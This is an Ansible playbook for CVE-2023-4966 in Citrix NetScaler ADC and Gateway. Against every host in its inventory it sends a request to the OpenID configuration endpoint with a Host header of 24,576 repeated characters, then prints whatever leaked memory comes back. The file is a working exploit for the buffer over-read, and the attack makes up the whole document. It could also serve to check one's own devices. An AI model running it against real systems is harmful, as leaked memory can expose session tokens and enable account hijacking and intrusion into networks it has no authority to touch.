- name: CVE-2023-4966 Citrix NetScaler ADC and NetScaler Gateway Buffer Overflow Vulnerability Playbook
  gather_facts: false
  hosts: all
  vars:
    uri: "oauth/idp/.well-known/openid-configuration"
    pattern: '^([a-f0-9]{32,64})\s*$'
    headers:
      host:
        - "a"
  tasks:
    - name: Connect to device
      ansible.builtin.uri:
        url: "http://{{ inventory_hostname }}/{{ uri }}"
        method: GET
        timeout: 2
        status_code: 200
        return_content: true
        force: true
        validate_certs: false
        headers:
          Host: "{{ (headers.host * 24576) | join }}"
      register: response
      ignore_errors: true
      delegate_to: 127.0.0.1

    - name: Examine device response
      ansible.builtin.debug:
        msg: "Device {{ inventory_hostname }} returned memory dump with content: {{ response.content }}"
      when:
        - response is defined
        - response.status == 200
        #- response.content | regex_search(pattern)
